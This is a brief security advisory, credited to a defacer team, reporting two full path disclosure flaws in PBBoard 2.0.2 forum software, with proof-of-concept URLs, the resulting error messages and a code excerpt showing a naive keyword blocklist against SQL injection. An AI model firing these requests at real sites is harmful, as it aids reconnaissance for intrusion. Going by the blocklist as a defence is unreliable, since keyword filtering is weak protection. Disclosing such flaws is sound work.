Advisory]PBBoard <=2.0.2 - Full Path Disclosure Details ======= Product: PHP <= PBBoard Security-Risk: moderated Remote-Exploit: yes Vendor-URL: http://www.pbboard.com Credits ============ Discovered by: rUnViRuS site: http://www.sec-area.com Affected Products: ---------------------------- test on PBBoard 2.0.2 maybe work under 2.0.2 More Details ============ 1. Full Path Disclosure ----------------------------------- allow attackers to gather the real path of the server side script. Proof of concept: http://www.[xxxxx].com/path/index.php?page=new_topic&index=1&id=union error Fatal error: Call to undefined method PowerBBLocalCommon::error() in /home/xxx/public_html/vb/common.php on line 193 code : // Check if $_GET don't value any SQL Injection foreach ($PowerBB->_GET as $sql_get) { if ((eregi("select", $sql_get)) or (eregi("union", $sql_get)) or (eregi("%", $sql_get))) { $this->error('ظ?ظ?طھ ط¨ط¹ظ?ظ?ظٹظ? ط؛ظٹط± ظ?ط´ط±ظ?ط¹ظ?!'); } } ================ ================ 2. Full Path Disclosure ----------------------------------- allow attackers to gather the real path of the server side script. Proof of concept: http://www.[xxxx].com/[path]/index.php?page=search&start=1&keyword=§ion=all&search=1 Warning: filesize() [function.filesize]: stat failed for show_msg in /home/xxxxx/public_html/vb/includes/template.class.php on line 99 Fatal error: ERROR::FILE_SIZE_IS_ZERO in /home/xxxxx/public_html/vb/includes/template.class.php on line 146 -------------------------------------------------- [W]orld [D]efacers [T]eam http://www.Sec-area.com --------------------------------------------------
